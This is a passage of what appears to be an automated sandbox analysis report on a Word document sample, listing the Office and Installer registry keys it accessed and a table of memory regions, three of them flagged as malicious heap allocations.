HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\7314D
7314D
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\7314D
7314D
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
There are 467 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
C60000
heap
page read and write
malicious
BB0000
heap
page read and write
malicious
CF0000
heap
page read and write
malicious
6BB0000
trusted library allocation
page read and write
8E94000
trusted library allocation
page read and write
6DF0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
4FB0000
direct allocation
page read and write
640000
heap
page read and write
8C60000
unkown
page read and write
242CDEE0000
trusted library allocation
page read and write
9D90000
trusted library allocation
page execute and read and write
A05E000
stack
page read and write
8A9C000
stack
page read and write
9D00000
trusted library allocation
page read and write
4DFD000
stack
page read and write
8E95000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
12BE8FF000
stack
page read and write
8E90000
trusted library allocation
page read and write
9D20000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
A020000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
6D9D000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
260000
heap
page read and write
4A60000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
1B09F1A0000
remote allocation
page read and write
8A1000
heap
page read and write
18199F13000
heap
page read and write
5779000
heap
page read and write
8F40000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
7ED0000
unkown
page read and write
8DF5000
trusted library allocation
page read and write
271AC638000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
12A4000
heap
page read and write
8EF0000
trusted library allocation
page read and write
271AC8E8000
heap
page read and write
20A95E60000
heap
page read and write
47EF8FF000
stack
page read and write
8BDE000
unkown
page read and write
9CC0000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
9D60000
trusted library allocation
page read and write
8C70000
unkown
page read and write
8AB0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
453E000
stack
page read and write
4876000
trusted library allocation
page read and write
7EDD000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6DB0000
trusted library allocation
page read and write
4F9E000
stack
page read and write
8CA0000
trusted library allocation
page read and write
5290000
trusted library allocation
page read and write
271A7958000
heap
page read and write
8F70000
trusted library allocation
page read and write
8DD0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6BB0000
trusted library allocation
page read and write
A076000
trusted library allocation
page read and write
49BF000
stack
page read and write
7000000
trusted library allocation
page read and write
B236000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
242CDD2D000
heap
page read and write
8C50000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
400000
unkown
page readonly
8C30000
trusted library allocation
page read and write
20A95E29000
heap
page read and write
8DB0000
trusted library allocation
page read and write
1819A602000
trusted library allocation
page read and write
8EB9000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
8E80000
trusted library allocation
page execute and read and write
401000
unkown
page execute read
7ED0000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
A5A117B000
stack
page read and write
8EB0000
trusted library allocation
page read and write
8DF0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
474E000
stack
page read and write
9CF0000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
91D0000
trusted library allocation
page read and write
1F65E429000
heap
page read and write
7ED0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
8D75000
trusted library allocation
page read and write
5064000
direct allocation
page read and write
4C80000
trusted library allocation
page read and write
7CC5000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8FE9000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
271AC750000
trusted library allocation
page read and write
8F40000
trusted library allocation
page read and write
6C30000
heap
page execute and read and write
8EF2000
trusted library allocation
page read and write
8BEE000
stack
page read and write
9C90000
trusted library allocation
page read and write
7D70000
trusted library allocation
page read and write
8DC0000
trusted library allocation
page read and write
B0AF000
trusted library allocation
page read and write
54C9000
trusted library allocation
page read and write
8D72000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
446000
unkown
page read and write
52A1000
heap
page read and write
AE92000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
4FDE000
stack
page read and write
9CC0000
trusted library allocation
page read and write
9F0000
trusted library allocation
page read and write
4AAD000
stack
page read and write
7EE5000
unkown
page read and write
9010000
trusted library allocation
page read and write
9D10000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
5AC000
stack
page read and write
529C000
heap
page read and write
7DF3000
trusted library allocation
page read and write
D6B000
heap
page read and write
7EB0000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
4A6E000
stack
page read and write
9D20000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
9CD0000
trusted library allocation
page read and write
271A7918000
heap
page read and write
8E95000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8C50000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
B0ED000
trusted library allocation
page read and write
1F65EC02000
trusted library allocation
page read and write
7F00000
trusted library allocation
page execute and read and write
9CC0000
trusted library allocation
page read and write
78E000
stack
page read and write
9210000
trusted library allocation
page read and write
8AB0000
unkown
page read and write
7CC0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
B2A0000
trusted library allocation
page read and write
51B3000
trusted library allocation
page read and write
271A8480000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
8E97000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
9266000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
490D000
trusted library allocation
page read and write
8B2C000
direct allocation
page read and write
4F50000
direct allocation
page read and write
48D0000
trusted library allocation
page read and write
8E90000
unkown
page read and write
7EE0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
7EC0000
unkown
page read and write
8D70000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
1FDF4B32000
heap
page read and write
AE38000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
9035000
trusted library allocation
page read and write
6B70000
trusted library allocation
page read and write
D55000
heap
page read and write
B082000
trusted library allocation
page read and write
9D30000
trusted library allocation
page read and write
5784000
heap
page read and write
52AA000
heap
page read and write
8F60000
trusted library allocation
page read and write
8FC000
heap
page read and write
134407E000
stack
page read and write
91A0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
1A051A3C000
heap
page read and write
4867000
trusted library allocation
page read and write
8FA0000
trusted library allocation
page read and write
AF50000
trusted library allocation
page read and write
8EAA000
trusted library allocation
page read and write
8FE000
heap
page read and write
5784000
heap
page read and write
8C70000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
9D70000
trusted library allocation
page read and write
AED6000
trusted library allocation
page read and write
380000
remote allocation
page read and write
134370B000
stack
page read and write
242CDF00000
heap
page read and write
9E4B000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
5283000
heap
page read and write
9200000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
570F000
stack
page read and write
5135000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
C6E000
heap
page read and write
8D70000
trusted library allocation
page read and write
5540000
heap
page read and write
ACAB000
trusted library allocation
page read and write
571C000
heap
page read and write
ACD0000
trusted library allocation
page read and write
8B01000
direct allocation
page read and write
6C10000
direct allocation
page read and write
9210000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
5120000
heap
page read and write
B134000
trusted library allocation
page read and write
6D10000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
6BC000
stack
page read and write
8EB0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
A040000
trusted library allocation
page read and write
4F5E000
stack
page read and write
B011000
trusted library allocation
page read and write
6B40000
trusted library allocation
page read and write
242CEA90000
unkown
page readonly
1B09EC29000
heap
page read and write
271AC82F000
heap
page read and write
271A7815000
heap
page read and write
1280000
heap
page read and write
6B60000
trusted library allocation
page read and write
4872000
trusted library allocation
page read and write
9DF9000
trusted library allocation
page read and write
CBE000
stack
page read and write
8C30000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
93D000
stack
page read and write
271AC8AC000
heap
page read and write
20A96602000
trusted library allocation
page read and write
B2E6000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8EB8000
trusted library allocation
page read and write
A5A127E000
stack
page read and write
271AC654000
trusted library allocation
page read and write
539E000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
2437D402000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
20FB9030000
heap
page read and write
6B71000
direct allocation
page read and write
8AD0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
6C57000
direct allocation
page read and write
8AB0000
trusted library allocation
page read and write
8C68000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
544A000
trusted library allocation
page read and write
7D80000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
6B70000
trusted library allocation
page read and write
8B2000
heap
page read and write
447E000
stack
page read and write
8B30000
direct allocation
page read and write
8AB0000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
1FDF4302000
heap
page read and write
B0D2000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
1B09EC02000
heap
page read and write
8C20000
trusted library allocation
page read and write
489D000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
8C62000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
8A5000
heap
page read and write
8ED0000
trusted library allocation
page read and write
8F10000
unkown
page read and write
8AB0000
unkown
page read and write
20A95E70000
heap
page read and write
5128000
heap
page read and write
8F50000
trusted library allocation
page read and write
18199D40000
heap
page read and write
7EB0000
trusted library allocation
page read and write
70A1000
heap
page read and write
506F000
trusted library allocation
page read and write
7E70000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8D70000
unkown
page read and write
8C40000
trusted library allocation
page read and write
9CD0000
trusted library allocation
page execute and read and write
7DCA000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
234F000
stack
page read and write
242CDB40000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
9180000
trusted library allocation
page read and write
2DCD000
stack
page read and write
8E95000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
7F10000
unkown
page read and write
6F054000
unkown
page readonly
9CF0000
trusted library allocation
page read and write
6DE0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
18199E3C000
heap
page read and write
7E14000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
100C7D000
stack
page read and write
550F000
stack
page read and write
9CF0000
trusted library allocation
page read and write
5100000
heap
page read and write
8E40000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
91A0000
trusted library allocation
page execute and read and write
7CC5000
trusted library allocation
page read and write
52A1000
heap
page read and write
8ED0000
trusted library allocation
page read and write
7E97000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
91B0000
unkown
page read and write
8C65000
unkown
page read and write
BD34000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
4937000
heap
page read and write
6B60000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
20A95CF0000
heap
page read and write
9C90000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
47EFAFF000
stack
page read and write
8E60000
trusted library allocation
page read and write
47EF5FB000
stack
page read and write
9CC0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
CC42D8E000
stack
page read and write
8D70000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
7CC7000
unkown
page read and write
7C70000
trusted library allocation
page read and write
5E30000
direct allocation
page read and write
9D70000
trusted library allocation
page read and write
8C75000
unkown
page read and write
4905000
trusted library allocation
page read and write
8F40000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
4FB0000
heap
page read and write
8D70000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
910000
trusted library section
page read and write
8ED0000
trusted library allocation
page read and write
7ED5000
trusted library allocation
page read and write
71DE000
stack
page read and write
7CC0000
unkown
page read and write
8C30000
trusted library allocation
page read and write
6B40000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8C53000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
4FD0000
direct allocation
page read and write
8F80000
trusted library allocation
page read and write
2437CAF0000
heap
page read and write
8C10000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
B09D000
trusted library allocation
page read and write
91E0000
unkown
page read and write
B0E4000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
20FB9200000
heap
page read and write
8D0000
heap
page read and write
AEDE000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
5406000
trusted library allocation
page read and write
6D10000
trusted library allocation
page read and write
1F65E400000
heap
page read and write
B30F000
trusted library allocation
page read and write
3709B7E000
stack
page read and write
8E90000
trusted library allocation
page read and write
A3E0000
heap
page read and write
6BC0000
trusted library allocation
page read and write
8C50000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
8C00000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
930000
heap
page read and write
